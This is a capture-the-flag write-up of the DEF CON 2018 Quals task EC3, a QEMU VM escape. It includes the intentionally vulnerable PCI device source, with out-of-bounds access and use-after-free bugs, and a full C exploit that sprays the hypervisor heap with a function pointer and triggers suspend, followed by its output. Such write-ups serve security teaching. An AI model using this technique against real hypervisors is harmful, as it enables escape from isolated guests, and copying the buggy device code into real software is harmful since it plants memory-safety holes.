Elastic cloud compute (memory) corruption (or EC3 for short) was a binary pwn task on recent DEF CON CTF 2018 Quals.

You’re dropped into a Linux virtual machine with root privileges, and your objective is to escape from the VM to read the flag on the host filesystem. Task description mentions some custom PCI device.

This virtual device’s implementation has heap overflow vulnerability allowing read-write out-of-bounds access and UAF vulnerability. Although this is more than enough to leverage well-known heap exploitation techniques, due to my inadequate pwn skills, I decided to resort to heap spraying instead.

Reverse engineering

You’re given an archive containing custom qemu-system-x86_64 binary along with some less interesting files like the kernel, initramfs image, bios-256k.bin and so on.

Nothing is known about this virtual PCI device at this point: no drivers, no documentation. The only option is to reverse-engineer its implementation. Although the binary is rather large (because it’s a patched QEMU), finding the device wasn’t too hard.

The device itself is really simple. It allocates so-called MMIO region in the RAM. Unlike ordinary RAM, memory accesses in MMIO range are intercepted by the device, and can cause side-effects. For example, if device in question was a serial port, read from certain location (so-called register) could pop next value from the input queue, and write could push given value into the output queue. Some other register may contain bitmask that describes current state of the devices: output queue full, input queue non-empty, current speed, and so on. Both real hardware devices and devices emulated by hypervisors are usually interacted with this way.

In case of device emulated by hypervisor, these registers are implemented by simple C functions. Here’s the source of our device (for clarity, it’s taken from GitHub repository released after the end of the game):

#define NBUFS	0xF
uint8_t *my_bufs[NBUFS];

static uint64_t ooo_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    oooState *ooo = opaque;
	uint64_t val = 0x42069;

	int cmd = (0xF00000 & addr) >> 20;
	int bin = (0x0F0000 & addr) >> 16;
	switch (cmd) {
		case 0xF: // 42069 : just to check
			break;
		default: // write
			{
			int16_t offs = (0xFFFF & addr);
			if (my_bufs[bin]) {
				memcpy (&val, &my_bufs[bin][offs], size);
			}
			}
	}
	return val;
}

static void ooo_mmio_write(void *opaque, hwaddr addr, uint64_t val,
                unsigned size)
{
    oooState *ooo = opaque;

	int cmd = (0xF00000 & addr) >> 20;
	switch (cmd) {
		case 0: // alloc
			{
			int bin = (0x0F0000 & addr) >> 16;
			if (bin == 0xF) {
				for (int i = 0; i < NBUFS; ++i) {
					my_bufs[i] = malloc (val * sizeof (uint64_t));
				}
			} else {
				my_bufs[bin] = malloc (val * sizeof (uint64_t));
			}
			}
			break;
		case 1: // free
			{
			int bin = (0x0F0000 & addr) >> 16;
			free (my_bufs[bin]);
			}
			break;
		case 2: // write
			{
			int bin = (0x0F0000 & addr) >> 16;
			int16_t offs = (0xFFFF & addr);
			memcpy (&my_bufs[bin][offs], (void *)&val, size);
			}
			return;
		default:
			break;
	}
}

static const MemoryRegionOps ooo_mmio_ops = {
    .read = ooo_mmio_read,
    .write = ooo_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static void pci_ooo_realize(PCIDevice *pdev, Error **errp) {
    // ...
    memory_region_init_io(&ooo->mmio, OBJECT(ooo), &ooo_mmio_ops, ooo,
                    "ooo-mmio", 1 << 24);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &ooo->mmio);
}

There’re several bugs in there. First, you can access (both read and write) offsets from -32768 to 32767 from the allocated buffer regardless of its actual size. Second, you can use buffers after free.

Additionally, the binary also includes unreferenced function that calls system("cat flag"). So if we took control of the program counter (RIP), we can just jump there.

Exploitation

Although PCI devices are usually interacted with using kernel modules, Linux also provides a way to do so from userspace (provided you have root). The interface is described in Documentation/filesystems/sysfs-pci.txt.

In short, you need to open file /sys/devices/pci0000:00/0000:00:04.0/resource0 (numbers may obviously vary), mmap it into memory and access required offsets.

Since the initramfs contains very few binaries (basically, only busybox), exploit has to be written in C, compiled on some other machine into a statically linked binary, and then transferred to the VM (uuencode/uudecode is my tool of the choice for these kind of tasks).

Although vulnerabilities present were enough to gain RCE using well known heap exploitation techniques, I wasn’t feeling confident enough to do so properly. I decided to play the dirty way.

The heap where overflow occurs is actually heap of QEMU itself. It has to contain some useful structures that can be overwritten, right?

Hoping that it would contain some function pointers, I scanned the heap for all values that looked like pointers into .text section of QEMU binary, and replaced all of them with address of aforementioned system("cat flag") gadget.

Unfortunately, these pointers were never called, and I got stuck for several hours.

My thought process was as follows. Assuming there’re actually live pointers (as opposed to remainings of already freed memory), in order to increase the chances that they will be called, guest operating system has to ask the hypervisor or its virtual devices to do something. The more intricate, the better. There were very few of the devices available, and poking them would require to write some “drivers” for them, which would be rather troublesome.

Suddenly, an idea popped into my mind. ACPI is a known clusterfuck of weird shit. Attempting to suspend the machine will surely do something interesting. Suspend has to put all the devices to some sleep state, maybe even reset some of them, and so on.

And it actually did the trick. Attempting to suspend the guest operating system after running heap spraying exploit gives the flag (and then crashes the hypervisor :)).

Exploit code

To summarize, exploit works as follows:

  1. Opens PCI device MMIO region.
  2. Uses out-of-bounds memory access to spray heap by replacing function pointers to system("cat flag") gadget.
  3. echo mem > /sys/power/state
#include <stdio.h>
#include <inttypes.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#include <sys/types.h>
#include <unistd.h>
#include <time.h>

#include <sys/mman.h>

static const char *path = "/sys/devices/pci0000:00/0000:00:04.0/resource0";

#define TEXT_START   0x400000 
#define TEXT_END     0xA34DC0

#define CATFLAG_FUNCTION 0x6E65F9

static void do_malloc(void *ptr, int index, int n) {
    uintptr_t addr = 0;
    addr |= 0 << 20;
    addr |= index << 16;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = n;
}

static void do_free(void *ptr, int index) {
    uintptr_t addr = 0;
    addr |= 1 << 20;
    addr |= index << 16;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = 0;
}

static void do_write(void *ptr, int index, int16_t offset, uint32_t value) {
    uintptr_t addr = 0;
    addr |= 2 << 20;
    addr |= index << 16;
    addr |= offset & 0xFFFF;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    *a = value;
}

static void do_write64(void *ptr, int index, int16_t offset, uint64_t value) {
    do_write(ptr, index, offset, value);
    do_write(ptr, index, offset+4, value>>32);
}

static uint32_t do_read(void *ptr, int index, int16_t offset) {
    uintptr_t addr = 0;
    addr |= index << 16;
    addr |= offset & 0xFFFF;
    addr += (uintptr_t) ptr;

    volatile uint32_t *a = (uint32_t*)addr;
    return *a;
}

static uint64_t do_read64(void *ptr, int index, int16_t offset) {
    return do_read(ptr, index, offset) | ((uint64_t)do_read(ptr, index, offset+4) << 32);
}

int main(int argc, char **argv) {
    int fd = open(path, O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    void *ptr = mmap((void*)0x700000000000ULL, 0x1000000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (ptr == NULL) {
        perror("mmap");
        return 1;
    }
    printf("mmaped at %p\n", ptr);

    for (int n = 1; n < 0x10000; n *= 2) { 
        do_malloc(ptr, 0, n);
        for (int i = -32768; i < 32768; i += 8) {
            uint64_t val = do_read64(ptr, 0, i);
            if (val >= TEXT_START && val <= TEXT_END) {
                do_write64(ptr, 0, i, CATFLAG_FUNCTION);
                printf("%d (%x): %"PRIx64" -> %"PRIx64"\n", i, (unsigned) i, val, do_read64(ptr, 0, i));
            }
        }
        do_free(ptr, 0);
    }

    system("echo mem > /sys/power/state");
}
30376 (76a8): 47cc25 -> 6e65f9
30568 (7768): 86b5ef -> 6e65f9
[   14.960242] PM: Syncing filesystems ... done.
[   15.036161] Freezing user space processes ... (elapsed 0.011 seconds) done.
[   15.051247] Freezing remaining freezable tasks ... (elapsed 0.006 seconds) done.
[   15.061707] Suspending console(s) (use no_console_suspend to debug)
ooo{testflag_bushwhackers}
0
qemu: qemu_mutex_lock_impl: Invalid argument
Aborted (core dumped)

See also

  • http://uaf.io/exploitation/2018/05/13/DefconQuals-2018-EC3.html - writeup by uafio. Unlike me, he actually obtained arbitrary write and overwrote GOT table entry.